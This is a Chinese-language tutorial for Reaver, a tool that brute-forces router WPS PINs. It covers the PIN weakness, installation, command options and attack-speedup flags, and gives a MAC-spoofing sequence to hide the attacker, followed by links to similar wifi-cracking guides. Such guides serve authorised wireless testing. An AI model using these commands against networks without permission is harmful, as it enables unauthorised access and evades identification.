reaver-wps

概述

Reaver是暴力破解接入点PIN码的一种工具。这里简单说明，PIN码是8位数字，且第8位是由校验和，由前7位可以推出。而前7位又分为4和3两部分，所以暴力尝试最多10000+1000=11000次即可完成，破解所需的时间通常在2-5小时。

支持的网卡驱动

完全支持

ath9k
rtl8187
carl19170
ipw2000
rt2800pci
rt73usb

部分支持

ath5k
iwlagn
rtl2800usb
b43

不支持

iwl4965
RT3070L
Netgear WG111v3

安装

Reaver只支持linux平台，需要libpcap和libsqlite库，可以下命令编译安装：

$ ./configure
$ make
# make install

卸载删除可使用命令;

# make distclean

命令参数

一般情况下，reaver需要的参数只有接口名和目标接入点的BSSID（MAC地址）：

# reaver -i mon0 -b 00:01:02:03:04:05

如果没有明确指定，reaver会自动识别目标接入点的信道和网络名（前提是接入点没有隐藏SSID）。可用如下命令指定信道和网络名：

# reaver -i mon0 -b 00:01:02:03:04:05 -c 11 -e linksys

默认情况下，如果接入点改变了信道，reaver也会相应地改变信道。然而当使用–fixed参数时，此功能会被禁用掉：

# reaver -i mon0 -b 00:01:02:03:04:05 --fixed

默认情况下的超时时间是5秒，使用以下命令则可以手动设置（最小为1秒）：

# reaver -i mon0 -b 00:01:02:03:04:05 -t 2

默认的pin码尝试延迟间隔是1秒，这个时间可以用以下命令设定为任何非负数，0表示没有延迟：

# reaver -i mon0 -b 00:01:02:03:04:05 -d 0

当发现一些可疑活动时，有些接入点会暂时锁定它们的WPS状态，通常小于5分钟。默认情况下，此时reaver会每隔315秒（5分15秒）检查一次状态，直到锁定状态解除再开始暴力破解。检查的时间间隔可以通过以下命令来调整任意一个非负值：

# reaver -i mon0 -b 00:01:02:03:04:05 --lock-delay=250

使用-vv参数可以显示更多信息，将每个正在尝试的pin码显示出来：

# reaver -i mon0 -b 00:01:02:03:04:05 -vv

默认情况下，接收M5和M7 WPS反应的时间间隔是0.1秒，可通过下列命令调节（最大是1秒）：

# reaver -i mon0 -b 00:01:02:03:04:05 -T .5

必要的时候，需要通过发送一个EAP FAIL的信息来关闭一个WPS会话，默认情况下此功能是不开启的，可通过以下命令开启：

# reaver -i mon0 -b 00:01:02:03:04:05 --eap-terminate

对每10个连续的unexpected WPS提示信息，会有一个warning。这可能是因为接入点限制了pin或者过载了，此时往往需要通过短时间的sleep来解决：

# reaver -i mon0 -b 00:01:02:03:04:05 --fail-wait=360

实战用法

基本用法

首先，开启monitor模式：

# airmon-ng start wlan0

使用reaver需要指定接入点MAC地址以及monitor接口名：

# reaver -i mon0 -b 00:01:02:03:04:05

或者使用-vv参数获得详细的进度信息：

# reaver -i mon0 -b 00:01:02:03:04:05 -vv

加速攻击

默认情况下，reaver的pin码尝试间隔为1秒，我们可以通过使用’-d 0‘参数来除去时间间隔。但是可能会使接入点出现问题：

# reaver -i mon0 -b 00:01:02:03:04:05 -vv -d 0

另一种加速攻击的方法是使用–dh-small。这个参数选项会使reaver尝试小的diffie-hellman密码，从而减轻接入点的计算负荷。

# reaver -i mon0 -b 00:01:02:03:04:05 -vv --dh-small

MAC地址欺骗

有时我们可能需要隐藏自己的MAC地址，reaver用-mac参数来支持此功能。注意：改变虚拟的monitor接口的MAC地址没有什么用，必须要改变物理接口的MAC地址，如：

# ifconfig wlan0 down
# ifconfig wlan0 hw ether 00:BA:AD:BE:EF:69
# ifconfig wlan0 up
# airmon-ng start wlan0
# reaver -i mon0 -b 00:01:02:03:04:05 -vv --mac=00:BA:AD:BE:EF:69

reaver-wps相关推荐

无线wifi-PJ-之在开启WPS下使用reaver
PJ简单解释: PIN码分前4和后4,先破前4只有最多一万个组合,破后4中的前3只有一千个组合,一共就是一万一千个密码组合. 10的4次方+10的3次方=11000个密码组合. 当reaver确定前 ...
渗透之——使用reaver傻瓜式破解wifi之利用路由器WPS漏洞
跟这篇破解教程一样,网上破解教程多是基于路由器的WPS漏洞破解,但是这样的路由器只占少数.一般wifi是依据WPA/WPA2加密的,因此想要破解一般的wifi,还得破解这个协议,虽然近期这个协议也被破 ...
使用reaver傻瓜式破解wifi之利用路由器WPS漏洞
跟这篇破解教程一样,网上破解教程多是基于路由器的WPS漏洞破解,但是这样的路由器只占少数.一般wifi是依据WPA/WPA2加密的,因此想要破解一般的wifi,还得破解这个协议,虽然近期这个协议也被破 ...
使用Reaver对WPS加密网络进行暴力破解
WPS状态探测探测开启了WPS功能的AP,WPS Locked状态为NO的表示开启了WPS功能. wash -i wlan0mon PIN码获取 reaver -i wlan0mon -b MAC地 ...
ubuntu-16.04(linux)使用Reaver爆破wifi密码(路由器的WPS功能漏洞)
路由器的WPS功能很多路由器都有WPS功能, 这边的WPS不是office工具软件, 而是路由器的一个功能: 路由器中WPS是由Wi-Fi联盟所推出的全新Wi-Fi安全防护设定(Wi-Fi Prot ...
aircrack加reaver破解带有wps的wifi
最近心血来潮,想把小区里的无线信号测试个遍.基于目前大多数路由器都支持wps,想必各位基友们都知道aircrack和reaver这两个工具,实属破解pin码,杀人越货,居家旅行之必备良药.像以前跑r ...
【安全牛学习笔记】WPS及其他工具WPS
WPS及其他工具 root@kali:~# service network-manager stop root@kali:~# airmon-ng check kill Killing these p ...
WPS漏洞利用工具Bully常见命令集合
WPS漏洞利用工具Bully常见命令集合 Bully是一款利用路由的WPS漏洞来破解WiFi密码工具.相比Reaver工具,Bully提升了资源使用效率,并提供了更丰富的设置选项.
Kali Linux 无线渗透测试入门指南第十章 WPS 和探针
第十章 WPS 和探针作者:Vivek Ramachandran, Cameron Buchanan 译者:飞龙协议:CC BY-NC-SA 4.0 太阳底下无新事. – 谚语这一章由新的技巧 ...
无线渗透（六）WPS、伪造AP
WPS (WIRELESS PROTECTED SETUP) WPS是WiFi联盟2006年开放的一项技术通过PIN码来简化无线接入的操作,无需记住PSK 路由器和网卡各按一个按钮就能接入无线 PI ...